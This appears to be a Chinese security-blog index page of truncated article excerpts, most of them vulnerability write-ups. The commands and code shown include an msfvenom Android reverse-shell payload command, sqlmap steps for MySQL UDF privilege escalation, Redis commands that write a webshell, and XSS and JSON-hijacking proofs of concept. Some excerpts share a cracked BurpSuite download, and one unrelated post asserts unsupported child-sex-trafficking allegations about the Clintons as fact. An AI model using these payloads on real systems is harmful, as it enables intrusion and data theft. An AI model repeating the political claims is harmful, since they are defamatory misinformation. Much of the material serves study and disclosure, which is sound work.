并不只是针对Lnmp的沙盒逃逸，而是.user.ini的设计缺陷达到绕过open_basedir限制，所以是通用的方法。首先来看看最新版LNMP是怎么配置open_basedir的：open_basedir=/home/wwwroot/default:/tmp/:/proc/ lsattr .user.ini ----i----------- .user.iniLNMP的open_basedir是通过.user.ini来配置的。再来看disable_functions都禁用了哪些函数：lnmp1.3/include/php.sh注意到了stream_socket_server被禁用了。这个是用来建立Socket服务端的，完全可以使用其他可创建socket服务端的函数进行反弹个socket会话，比如socket_create、 fsockopen。不过虽是可以建立socket会话，但group为www，所以这个留在后面结合使用。.user.ini是不允许增删改的，那怎样能突破限制？.user.ini只在当前目录生效了。那么我们可不可以写入新的.user.ini并且不与原.user.ini冲突，将其open_basedir指向根目录？可以的。首先创建一个目录并写入新的.user.ini。新的.user.ini需要1-3min来生效。open_basedir=/最后结合socket，使 ...继续阅读 (37)

不少安全性较高的网站，会提供一个安全输入框插件，用户必须下载安装后，才能输入账号口令等数据。例如各大网银的登录页面，相信大家都见过。下面我们来探讨，这类安全插件对用户输入的数据，究竟能起到多大的保护效果。对抗稍了解编程的朋友都知道，用户在安全框内输入时，其他程序是无法通过简单的技术手段，来截获按键消息的。因为插件会从最底层的键盘驱动中取走消息，保障按键过程无法被轻易窃听。同时，也无法简单地通过内存扫描等手段，获取控件内部的数据。所以从系统攻防上，这类插件还是有一定保护效果的。但是，攻击者非得从系统攻防上进行对抗吗？绕过我们先来聊一个其他话题。大家都知道 HTTPS 是难以破解的，但这并不意味它就是无懈可击的。例如某些场合下，使用类似 SSLStrip 的工具，就能让用户进不了 HTTPS —— 我们虽然不能解决问题，但能回避问题。类似的，对于安全输入框，我们也可设法回避它。例如，支付宝曾经使用的登录插件（几年前的截图）：从系统攻防的角度来看，它是管用的。恶意程序想通过按键窃听口令，并不十分容易。至于想靠页面中的 JS 来捕获键盘事件，那更是天方夜谭。然而事实上，用 JS 攻击才是最容易、最可行的。并不是因为这个插件存在什么接口、暴露了什么隐私，而是，这里根本就用不着插件！如果能运行 JS，我们只需简单地删除插件 DOM，然后通过 HTML 画个相似的输入框，就能钓到用户口令了:)$ ...继续阅读 (34)

WordPress最近曝出内容注入漏洞，影响到REST API——来自Sucuri的安全研究人员最先发现该漏洞。未经授权的攻击者利用该漏洞可注入恶意内容，以及进行提权，对文章、页面等内容进行修改。REST API是最近添加到WordPress 4.7.0并默认启用的。鉴于WordPress使用的广泛性，该漏洞的影响还是比较大的。使用 WordPress REST API 是简便高效的通过 JSON 格式传输数据访问或控制 WordPress 站点内容的方法。API 提供了对用户、文章、分类等不同功能的控制，也可以通过 API 检索或修改文章。WordPress REST API 插件在 4.70 集成到 WordPress 中，由于权限控制失效导致内容注入或修改。WordPress开发团队已经与Sucuri配合在最新的4.7.2版本中修复了该漏洞。漏洞名称：WordPress REST API 内容注入/权限提升影响版本：4.7.0 – 4.7.1漏洞详情：WordPress 在 4.7.0 版本后集成了原 REST API 插件的功能Permalinks设置为非Plain模式使用 WordPress 程序的网站首页上会有：<link rel="https://api.w.org/" href="http://www.xxx.com/wp-json/">API 地址则为 ...继续阅读 (30)

新年礼包三、提前祝大家17年0day多多。 漏洞文件:/Application/Common/Model/CompanyProfileModel.class.phppublic function add_company_profile($data,$user) { $this->_user = $user; // 替换原名称 $company = =$this->field('id,companyname')->where(array('uid'=>$user['uid']))->find(); if($company){ $data['companyname'] = $company['companyname']; } if(false === $this->create($data)) { return array('state'=>0,'error'=>$this->getError()); } else { if($company['id']) { if(false === $num = $this->save()){ return array('state'=>0,'error'=>'数据添加失败！'); ...继续阅读 (41)

新年新气象，第二弹发射~~~注入：漏洞文件:/cms/modules/assist_category/module.phpfunction add_list($iid,$sids){ //echo $sids; $temp = array(); $list_sid = explode(",",$sids); foreach((array)$list_sid as $v){ if(empty($v))continue; $flag = $this->DB_master->query("INSERT INTO {$this->list_table} (sid,iid) values ({$v},{$iid})"); if($flag) $temp[] = $v; $this->item_count($v); } return $temp; }这里的$v以及$iid缺少单引号的保护,先函数回溯关联文件:/cms/modules/item/call/add.call.php$verified = false; $ever_verified = empty($data['main']['ever_verified']) ? 0 : 1; if($data['verify'] == 1){ $verified = true; ...继续阅读 (30)

作者：Yaoqi Jia (新加坡国立大学）早期的网页浏览器(Web browser)作为一个简单的网页文档显示软件，没有隔离不同的资源和对象。利用任何一个内存漏洞，攻击者就可以控制整个浏览器。现在主流的浏览器采用 沙箱技术分离互联网网页和本地的资源，从而阻止恶意网页通过利用内存漏洞来影响本地系统。同时这些浏览器也采用了基于进程隔离的设计，用来隔离不同源的网 页，从而确保相互之间不会受到安全漏洞的影响。谷歌Chrome与微软Internet Explorer拥有合计超过80%的市场占有率，都相继采用了这些安全隔离的设计。在这篇论文中，我们用作为代表的Chrome研究这种安全隔离的设计 问题，以及这种隔离设计的不足带来的互联网与本地系统的跨边界攻击。Chrome使用沙箱技术来保护网页和本地的边界 谷歌Chrome在两个方面使用权限隔离(privilege separation)。首先，Chrome使用沙箱技术将能直接与本地操作系统通信的浏览器内核进程（browser kernel）与负责解析和渲染网页的渲染进程（renderer）进行隔离。其次，Chrome将不同源的网站实例或者标签隔离到不同的进程中。与之前 研究（如Gazelle和OP）提出的隔离概念不同，Chrome权衡安全和性能在同源策略的实现上做出了折中。同源策略(The same-origin policy)确保 ...继续阅读 (36)

开场都是为了烘托气氛,一句话：新年到,燥起来,煎饼会有的,肉也会有的。漏洞文件:/admin/app/physical/physical.php $post=array('ver'=>$metcms_v,'app'=>$applist); $result=curl_post($post,60); if(link_error($result)==1){ $results=explode('<Met>',$result); file_put_contents('dlappfile.php',$results[1]); file_put_contents('standard.php',$results[0].$results[1]);文内中有文件操作函数file_put_contents,但通过文中可以看见如果要操作这个函数那得控制result这个变量,先跟进curl_post关联文件:/include/export.func.phpfunction curl_post($post,$timeout){ global $met_weburl,$met_host,$met_file; $host=$met_host; $file=$met_file; if(get_extension_funcs('curl')&& ...继续阅读 (33)

0x00: 前言近日接连几次接触到关于UTF-8的non-shortest form的安全问题，即UTF-8的非最短形式编码的非法多字节数据在系统的不同处理过程中，先后被依照不同标准被解释，而可能造成现有安全机制被绕过的问题。查找相关中文资料，发现关于编码安全相关内容的文章资料较少，所以在查找其它相关资料后，按照自己的理解写下此文。0x01: Unicode与UTF-8为防止读者对两者概念有所混淆，不方面下文的理解，故先区分两者的意义。总的来说，Unicode是容纳了多国众多不同字符的大一统字符集合，其核心是提供了一个数值与字符映射关系的超大编码表格，是一个抽象的标准；现 在使用的Unicode(UCS-2，以下说明默认使用little endian方式存放)大都是用2个字节，也就是16 bit来表示一个字符；而UTF-8是一种编码方式，是针对Unicode字符集的一种具体实现，它规定了如何通过一个数值来准确的找到相应的Unicode字符；UTF-8编 码使用变长的字节来存储不同的字符，这样做的目的，主要是可以节省存储空间，但是这样就必须解决另一个问题:字符从中间开始匹配的问题；对这个问题随意举个栗子:一个字符需要3个字节表示，16进制表示为【0x02a706】，一个字符需要2个字节表示，16进制表示为【0x02a7】，那么我解析字符时，是到0x02a7时结束，还是继续解析，到0x ...继续阅读 (44)

前言从一开始我们就试图把分析处理对象指定为大规模环境中的Web威胁，不是为了浮夸与博眼球，也不是为了刻意拔高姿态，而是寄希望与能找到一种普世通用的数据方法论能适用于各种不同类别的中小型站点所面临的威胁。这里的「大规模」，指的是有着成百万乃至上千万的站点的环境。这些站点使用着不同的编程语言、不同的框架、不同的Web组件，有着不同的业务、不同的逻辑以及不同的用户，唯一相同的是它们每天都在遭受着各式各样的攻击。同时，大规模的环境之下充斥着各种转瞬既逝的信息，消逝之快快到我们来不及停下来谛听，新的信息又联翩而至。对于威胁，没有什么是比「大规模」与「转瞬既逝」还更好的庇护。相比茫然，我们更多的是恐惧，恐惧的不是看到了这么多威胁，而是那些还没看到的威胁。我们甚至回答不出还有多少是未知，而未知，永远又是最为可怕的。我们一次次为新的未知感到惊喜，而又一次次的面对着新的未知，怀疑自己怀疑着这个世界。这个系列至少有三个部分，我们希望能在不断探索的过程中，尝试摸索楚一些科学的数据方法，用有别于经典安全产品的思路来尝试解决一些新问题，以及对老问题的解法「re-design」。由于篇幅有限，第一部分只能先铺垫一些浅层次的知识，感知的也注定只是一些浅层次的线索。同时，第一部分的所有思路都不是任何一个人的功劳，是多少个日夜大家一起碰撞后的成果。他们是：@碳基体、@Rainy_zh、@zhouxiangrong、 ...继续阅读 (25)

0x01 About编写过 Chrome 扩展的开发人员都应该清楚在 crx 后缀的包中， manifest.json 配置清单文件提供了这个扩展的重要信息，crx 后缀文件可以直接使用 unzip 解压，Windows 下的安装后解压的路径在：C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions ，MacOS 在：cd ~/Library/Application\ Support/Google/Chrome/Default/Extensions ，其中 manifest.json 的样例：➜ 0.7.0_0 cat manifest.json { "background": { "scripts": [ "background.js" ] }, "content_scripts": [ { "all_frames": true, "js": [ "content.js" ], "matches": [ "http://*/*", "https://*/*", "ftp://*/*", "file:///*" ], "run_at": "document_end" ...继续阅读 (19)

文章内容可能具有一定攻击性，本文仅供技术交流，如有非法使用后果自负。在这次的实验中，我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。创建负载我们需要两台虚拟机：Kali Linux和安卓模拟器。 打开vm启动Kali linux。接着打开终端，使用msfvenom制作android利用程序。Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。一旦打开终端提示符下输入以下命令，使用msfvenom工具来创建有效载荷APK文件。``` msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk ```p 设置要使用的payload LHOST 设置用来接收反弹连接的主机 LPORT 设置用来接收反弹连接的端口 R 设置文件格式 Location 要保存的文件位置这个命令执行完之后，你会看到一些错误，但不用担心。现在可以到输出目录查看生成的apk了。 我们已经成功创建了Android格式（APK）文件的有效载荷。现在一般Android ...继续阅读 (31)

JSM（Java Security Manager），又名java安全管理器，经常被用于java进程中的一些权限限制和保护的作用，类似 php 中的 disable_functions ，但 disable_functions 主要是针对函数的禁用操作，而JSM更偏向于运行时的授权检查，根据配置好的安全策略来执行。一般启用 JSM 只要在启动 java 进程的时候加入参数即可，比如：java -Djava.security.manager-Djava.security.policy=/home/yourPolicy.policy -jar application.jar而/home/yourPolicy.policy则是用户自行配制的策略文件，一般长这样：grant { permission java.io.FilePermission "/home/secret.txt", "read"; };这就表示这个java进程对secret文件只有只读的权限。而本文主要总结一下当策略文件被赋予了”createClassLoader”时，能够bypass整个JSM策略的方法。当然，createClassLoader只是最基础的一个权限，其实很多类似的权限都有同样的问题。其实很早之前空虚浪子心（kxlzx）就有写到过他是如何利用 creatClassLoader 来绕过SAE的沙箱， ...继续阅读 (20)

Trend Micro – Control Manager 6.0介绍：http://www.trendmicro.tw/tw/enterprise/security-management/control-manager/0x001摘要我已经开始研究安全厂商的安全解决方案。我想了解他们安全态势方面做的有多好。在此期间，我查看并发现了Trend Micro – Control Manager 6.0中的几个漏洞。这些漏洞允许未经身份验证的用户读取密码等敏感文件（如配置文件）0x002弱点Authentication bypassTrend Micro – Control Manager 6.0分为两部分。分别为.NET开发和PHP开发。一些PHP代码为单点登录应用之间的主要认证。然而，一些调试代码没有删除，可以通过向cookies添加特定值来绕过认证。缺陷位于文件“product_auth.php”。如果请求Cookie中包含“ApplyToServer”和“WGFS”并设置为1或“WFINFOR”，则绕过验证。0x003任意文件读取然后利用没有删除的PHP代码来调用可用函数。我查看了一部分的源码，函数(getLangFile)正确的验证了参数。可以用它来读取任何XML文件。响应中回复了完整的安装路径，便于我们利用。读取包含敏感信的SystemConfiguration文件：Requ ...继续阅读 (35)

0x00简介这篇是讲过的一些账号通行证安全相关的PPT的文字整理版，稍微补充了点内容。因为懒一直没时间写，但年关将至，想到可以为老家的孩子们多挣点压岁钱……以前我在测百度的一个账号体系的漏洞时，无意中进入了慈云寺桥一甜品店的女收银员的百度网盘，当时随便看了两眼，突然发现了她的一张裸照，吓的我赶紧关了页面。当时我就想，如果她是我最好的朋友的女朋友，她的裸照被坏人利用漏洞攻击而泄露了，那该多不好呀换位思考后，我闭着眼，对着裸照暗暗发誓，保护女网友，人人有责此文很长，建议各位让女朋友不用再等了，让她先睡主流盗号的八十一种姿势密码类漏洞— 密码泄露、暴力破解、撞库、密码找回漏洞、社工库、钓鱼、爱情…登陆凭证被盗（ 最常见的cookie ）— xss攻击、网络泄露、中间人攻击其他漏洞— 二维码登录、单点登录、第三方登录、客户端web自动登录、绑定其他账号登录、跨域登录、oauth登陆漏洞…今天不讲密码安全，今天主要讲讲互联网上常见的一些通行证相关的“其他漏洞”0x01先稍微讲讲认证cookie的安全目前各大互联网公司的网站大多使用cookie来实现对用户的认证。如果攻击者拿到了这个认证cookie，如果此cookie背后的风控不强，那么我们就可以登录用户的账号了cookie安全的注意点不可伪造：cookie的设计要有不可猜测性Httponly：防止cook ...继续阅读 (25)

0x00 关于HSTS浏览器在用户输入网址时，会默认使用http协议，即使该站点已经设置了https。比如www.example.com已经设置了https，但是如果用户在浏览器中只输入www.example.com，那么其实是默认访问的http://www.example.com，这时候服务器端只能做个302跳转，将请求显式指定到https://www.example.com。但是这存在中间人劫持的风险，大致如下图（盗个图）：即中间人劫持了http流量，然后自己去与服务进行https通信，将请求内容再用http返回给被劫持用户，因此该劫持出现在两种情况下：（1）用户没有通过准确的方式访问页面，除非输入 https:// ，否则浏览器默认以 http 方式访问（2）HTTPS 页面的链接中包含 http，这个 http 页面可能被劫持但是HSTS是一个在浏览器端强制实施https的情况，可以杜绝这个场景。服务器通过设置一个header来告诉浏览器，所有有这个header的都要在浏览器端强制使用https，比如直接访问www.baidu.com，浏览器会自动跳转至https上去，这一切都是在浏览器端执行的：这个header就是Strict-Transport-Security:max-age=172800，如果max-age设置为0，则表示关闭HSTS。0x01 HSTS状态漏洞去年 ...继续阅读 (16)

虚拟机保护已经是现代保护壳不可缺少的一环，虽然逆向方也发展出各种插件帮助分析，但只针对特定某款，通用性的方法却不多见。我总在想，既然虚拟机的结构是固定的，如果有一款工具能够记录指令流，那么按图索骥，也许能发展出一套通用的分析方法来。其实OD就有记录指令流的功能，叫跟踪（trace），也许是效果不好或者操作不便，用的人甚至知道的人不多。先介绍下怎么用。OD的跟踪功能原理很简单，就是每一步都自动下单步断点，然后记录断下来的指令信息。这项功能涉及到几项设置，第一项是缓存大小，不难想象，跟踪得到的这一些列的指令记录是需要占地方存储的，占多大可以设置，位置在调试选项（Debugging options）->跟踪（Trace），如图1。第一项就是缓存的大小，内存允许的话，自然是多多益善，毕竟缓存越大，允许记录的信息越多。第二项是记录的内容，跟踪会自动记录地址模块等信息，此外可以选择是否记录指令、ESP和标志位的信息。设置位置紧接着缓存大小，见图2，可以按需勾选，本文只需要记录指令即可。最后一项是在调试（DEBUG）菜单中打开Trace。现在Trace已经设置完毕了，按下Ctrl+F12，查看Trace窗口，应该已经开始记录执行过的指令。否则请检查前述设置和操作是否正确。那么，虚拟机保护要怎么入手分析呢？前面我提到，虚拟机是有固定结构的，既然要分析，那对应的找到这些结构应该就可以了。传统保 ...继续阅读 (26)

前几天做一个小竞赛中有一个题目：给定的测试环境登录页面有POST注入漏洞，于是果断操起sqlmap跑数 据，无意中发现当前MySQL连接用户为root，于是想到udf提权「虽然Windows下MySQL提权基本上没问题，但是Linux环境下原来一直 没成功过。」，最终成功获取root权限「主要问题在于MySQL是以root权限运行」，记录笔记如下，方便以后查阅：具体步骤如下找到MySQL插件目录:python sqlmap.py -u 'http://xxxx' --sql-shell show variables like "%plugin%";利用sqlmap上传lib_mysqludf_sys到MySQL插件目录;python sqlmap.py -u 'http://xxxx' --file-write=/lib_mysqludf_sys.so --file-dest=/usr/lib/mysql/plugin/激活存储过程「sys_exec」函数:python sqlmap.py -u 'http://xxxx' --sql-shell CREATE FUNCTION sys_exec RETURNS STRING SONAME lib_mysqludf_sys.so SELECT * FROM information_schema.routi ...继续阅读 (13)

早先玩360补天的时候看见有这个厂商挖的洞,但是忘记提交了。看了一下最新版还是存在的。 漏洞文件:/app/user/action/api.php$sitekey = trim($_POST[\'sitekey\']); $sitename = trim($_POST[\'sitename\']); $openid = trim($_POST[\'openid\']); $username = trim($_POST[\'username\']); $email = trim($_POST[\'email\']); $phone = trim($_POST[\'phone\']); $face = trim($_POST[\'face\']); if($sitekey!=\'thinksaas\'){//ÕýʽʹÓõÄʱºòÇëÐ޸Ĵ˴¦thinksaasΪÆäËû×Ö·û´® getJson(\'sitekeyÃÜÔ¿²»ÕýÈ·\'); } if($sitename && $openid && $username && $email){ $strOpen = $new[\'user\']->find(\'user_open\',array( \'sitenam ...继续阅读 (18)

今天在找回某台ubuntu机器的密码时，顺利进入了root界面，但在passwd root后，提示：authentication token manipulation error，搞了很久没搞定，最终通过以下方式解决，分享给大家：找回密码时我们身边并没有安装盘，但grub为我们提供一个非常方便的方法。在启动界面，我们选择第二项kernel 2.6.12-*-* (recovery mode)，然后选择“root       Drop to root shell prompt”，输入命令passwd 用户名，这时你想改哪一个用户的密码都可以，例如修改root密码：passwd root，接着输入两次相同的密码即可修改密码，做完这个相信大家都会觉得linux这样太不安全了，但是你可以设置bios密码嘛，毕竟给自己带来方便 的同时也给别人提供了机会。在修改密码的时候，或许会出现authentication token manipulation error导致修改不成功，这是因为存放密码的文件只读了，所以我们得修改一下该文件的权限，通过命令：mount -rw -o remount /然后在修改就搞定了。之前在centos下没遇到过，ubuntu下遇到了，记录一下 ：）【via@网络】 ...继续阅读 (17)

快元旦了,不知道该写哪一类的文章就只有发一些自己手里有的各种坚果了。都会慢慢的发出来的,有知名cms,也会有不是很知名的漏洞文件:/apps/public/Lib/Action/AttachAction.class.phppublic function ajaxUpload() { $d['type_name'] = 11; D('feedback_type')->add($d); $attach_type = t($_REQUEST['type']); $options['uid'] = $this->mid; $options['allow_exts'] = t(jiemi($_REQUEST['exts'])); $options['allow_size'] = t(jiemi($_REQUEST['size'])); $jiamiData = jiemi(t($_REQUEST['token'])); list($options['allow_exts'], $options['need_review'], $fid) = explode('||', $jiamiData); ...继续阅读 (25)

via:Mramydnei前不久在日本比较著名的XSS会议ShibuyaXSS上，著名漏洞猎人，Cure53成员Masato kinugawa在会议上分享了个比较有趣的Internet Explorer的BUG。借助该BUG可以在application/xx的response下优雅的完成XSS攻击。POC.htm<meta charset=utf-8> <iframe id=x src=redirect.php></iframe> <script> x.location.reload(); </script>redirect.php<?php header("location: json.php"); ?>json.php<?php header("Content-Type: application/json"); ?> <img src=x onerror=alert(1)>测试于Windows7/Internet Explorer 11解决方案：设置X-Content-Type-Options头 -> header(‘X-Content-Type-Options: nosniff’); ...继续阅读 (23)

原文链接：JSON hijacking for the modern web原作者：Gareth Heyes译：Holic (知道创宇404安全实验室)Benjamin Dumke-von der Ehe 发现了一种有趣的跨域窃取数据的方法。使用JS 代理，他能够创建一个 handler，可以窃取未定义的 JavaScript 变量。这个问题在 FireFox 浏览器中似乎被修复了，但是我发现了一种对 Edge 进行攻击的新方式。虽然 Edge 好像是阻止了分配window.__proto__的行为，但他们忘了 Object.setPrototypeOf 这个方法。利用这个方法，我们可以使用代理过的__proto__来覆盖__proto__属性。就像这样：<script> Object.setPrototypeOf(__proto__,new Proxy(__proto__,{ has:function(target,name){ alert(name); } })); </script> <script src="external-script-with-undefined-variable"></script> <!-- script contains: stealme -->Edge PoC stealing ...继续阅读 (23)

正文这次我要讲的是如何成为白帽黑客。有很多事情可以使一个人发狂，尤其是缺乏学习所需的坚决与目标感，所以我会先讲砖为什么搬为什么不搬，是沾满民脂的红砖更适合搬还是混凝土小型空心的砌砖。工欲善其事必先利其器，这是大家经常能看见的一句话。在当今互联网下，想要更好地撂倒对手，我们需要更可怕的武器「一口箱子」，箱子里的武器不见可以组成任何一件兵器，用来对敌，但更重要的还是提着箱子的你。我知道国内外都有十四五岁的小白帽通过「漏洞奖励计划」获得过数万奖金，但奖金不是最重要的，最重要的是，这种实践方式可以让我们更快地找到自己的方式，或者说找到自己。每个人的性格天赋又都是独一无二的，因此找到真实的自己就等于找到了用的人最少的「 Hack mind 」。关于我我是长短短，目前在 PKAV Team 主导分布式漏洞扫描器的开发，从事了 5 年的 Web 安全研究，接触网络安全已经快十年了，为《 HTML5 规范》做过一些贡献，对浏览器及 Web 前端安全有深入的研究 ，获得过 Google / Adobe / Apple 的「安全更新致谢」，《 HTML5 Security Cheatsheet 》的编写人之一， 发布过目前世界最强大的 XSS 攻击技术思维脑图（ https://git.io/vPpcM ） ，当然也懂点渗透。这次 Live 主要包括下面这些问题：如何选择适合自己的白帽技能学习路线？互 ...继续阅读 (19)

BurpSuite是一款信息安全从业人员必备的集 成型的渗透测试工具，它采用自动测试和半自动测试的方式，包含了 Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer等工具模块。通 过拦截HTTP/HTTPS的web数据包，充当浏览器和相关应用程序的中间人，进行拦截、修改、重放数据包进行测试，是web安全人员的一把必备的瑞士 军刀。官方提供免费版和专业版，以下是两个版本的功能对比。官方最新版新支持window(.exe)直接安装，下载地址：https://portswigger.net/burp/download.html但是由于近期版本过期的问题，分享@Larry_Lau 破解版本(安全性大家自查，仅供尝鲜)，方便大家使用。链接:http://pan.baidu.com/s/1bK505o密码: pr9q【破解作者：Larry_Lau 转自bobao.360.cn】 ...继续阅读 (20)

正题开始:首先从wap.php文件中看到这里的内容，winmail是伪全局，我们现在走进index.php前面的判断完全可以直接忽略，我们直接看后面$logofile = ''; if ($logoimage != '') { if (strncasecmp($logoimage, 'jpg:', 4) == 0 || strncasecmp($logoimage, 'gif:', 4) == 0 || strncasecmp($logoimage, 'png:', 4) == 0) { $arrImage = explode(':', $logoimage); if (count($arrImage) == 3) { $logofile = $customizepath.$f_domain.'_logo.'.$arrImage[0]; if (!file_exists($logofile) || filemtime($logofile) <= floatval($arrImage[1])) { $fullfile = $webmailhome_directory.$logofile; file_put_con ...继续阅读 (27)

用gcc编译使用了POSIX thread的程序时通常需要加额外的选项，以便使用thread-safe的库及头文件，一些老的书里说直接增加链接选项 -lpthread 就可以了，像这样：gcc -c x.c gcc x.o -ox -lpthread而gcc手册里则指出应该在编译和链接时都增加 -pthread 选项，像这样：gcc -pthread -c x.c gcc x.o -ox -pthread那么 -pthread 相比于 -lpthread 链接选项究竟多做了什么工作呢？我们可以在verbose模式下执行一下对应的gcc命令行看出来。下面是老式的直接加 -lpthread 链接选项的输出结果：$ gcc -v -c x.c ... /usr/lib/gcc/i486-linux-gnu/4.2.4/cc1 -quiet -v x.c -quiet -dumpbase x.c -mtune=generic -auxbase x -version -fstack-protector -fstack-protector -o /tmp/cch4ASTF.s ... as --traditional-format -V -Qy -o x.o /tmp/cch4ASTF.s ... $ gcc -v x.o -ox -lpthread . ...继续阅读 (21)

这两天几乎全世界的媒体都被希拉里的故事刷爆了。。。。纽约警察局刚搜了希拉里的家!你可能已经听说，现在纽约警察局获得了安东尼·韦纳和Huma Abedin的家庭设备作为一部分调查材料，所谓与未成年女孩“性交”…令人完全震惊的是，NYPD最终在这些设备上发现并搜查HILLARY的财产，以650,000封电子邮件的形式连接到她的个人电子邮件服务器…现在她的私人财产由纽约警察局和联邦调查局掌握!一个NYPD声称，在该设备的电子邮件中，希拉里和比尔·克林顿及他们被定为恋童癖朋友Jeffrey Epstein直接暗示一个大型儿童性交/贩卖网络。Jeffrey Epstein是一个注册的三级性罪犯，媒体忽视了比尔·克林顿使用Jeffrey Epstein的私人飞机26次，据称访问JeffreyEpstein的性奴隶岛。现在希拉里也被直接牵连，媒体不能再忽视这个了!这将是美国选举史上最大的丑闻!神奇的是，Trump 居然在一年多前就发帖预言了这整件事“胡玛·阿贝丁知道希拉里邮件门的所有事情，而韦纳将会告诉这个世界。”不过，老特预言到了韦纳，却没有预言到另一个神助攻，此人自称知道希拉里团队销毁的3万封信件在哪，还能合法找回。。。这个德国大胖子，他总是在颠覆世人的三观。这一次，又颠覆了，而且是彻底颠覆了。他成了世界级别的大名人。整个美国的政局，或许就是被他给颠覆了。此胖名叫Ki ...继续阅读 (17)

Redis 数据库在内网渗透中比较常见，结合近期的利用过程，记录下：在内网机器中下载Redis 解压 make一下，不用make installA) 一般情况下知道路径写shell./redis-cli -h IP config set dir /home/wwwroot/default/ config set dbfilename redis.php set webshell "<?php phpinfo(); ?>" save参考https://www.secpulse.com/archives/5357.htmlB) 利用公匙免密码登录1 本机生成公匙2 利用redis将公匙备份到redis机器上参考https://www.secpulse.com/archives/40406.htmlC) 利用linux的任务反弹shell1 /var/spool/cron linux机器下默认的计划任务，开启cron的时候，linux会定时去执行里面的任务，文件名为用户名2 redis 设置dbfilename 到上面可以直接反弹shell回来参考https://www.secpulse.com/archives/49962.html大概总结了主要是以上三种方式获取redis服务器的权限，因为redis一般都是root权限启动的，所以权限很大。但渗透过程中总是 ...继续阅读 (26)

在Blackhat USA 2016上，来自Deep Instinct的安全研究人员呈现了一个名为《Certificate Bypass: Hiding and Executing Malware from a Digitally Signed Executable》的演讲，咋一看还觉得挺惊奇的，听过演讲之后才发现原理十分简单，而且大部分内容都集中在内存加载PE文件上，于是忍不住又是一阵 惊奇：这也可以？在仔细读完作者的Paper之后，发现和传统技术点还是有区别的，不过也有很大的限制。早期的恶意软件为了躲避检测，使用过一种叫做“傀儡进程注入” 的技术。通俗一点讲，就是先启动并挂起一个合法的可执行文件（进程A），随后通过跨进程内存读写来将自身（或者是第三方PE文件）注入到进程A，同时处理 输入表和重定位表，最后跳转到入口点来执行代码，这样就完成了一次借尸还魂的操作。原始恶意进程在完成这一操作之后会自动退出，而之后恶意代码会一直在傀 儡进程中运行，也就达到了隐藏自身的目的。那么，Blackhat上的这个演讲有什么不一样的地方呢？有两个关键的地方。首先，在一个带有合法数字签名的可执行程序中隐藏恶意程序，并且保证原有数字签名的有效性不会被破坏。这可以在一定程度上躲避杀毒软件的检测，因为 某些杀毒软件可能并不会仔细去检查带有合法数字签名的程序。这一过程的实现钻了Windows校验数字签名的一 ...继续阅读 (29)

0x01 前言注：文章里“0day”在报告给官方后分配漏洞编号：CVE-2016-1843在前几天老外发布了一个在3月更新里修复的iMessage xss漏洞（CVE-2016-1764）细节 ：https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/https://github.com/BishopFox/cve-2016-1764他们公布这些细节里其实没有给出详细触发点的分析，我分析后也就是根据这些信息发现了一个新的0day。0x02 CVE-2016-1764 漏洞分析CVE-2016-1764 里的最简单的触发 Payload：javascript://a/research?%0d%0aprompt(1)可以看出这个是很明显 javascript 协议里的一个小技巧%0d%0a没处理后导致的 xss，这个 tips 在找 xss 漏洞里是比较常见的。这个值得提一下的是为啥要用 prompt(1) 而我们常用的是 alert(1) ，我实际测试了下发现 alert 确实没办法弹出来，另外在很多的网站其实把 alert 直接和谐过滤了，所以这里给提醒大家的是在测试 xss 的时候，把 prompt 替换 ...继续阅读 (20)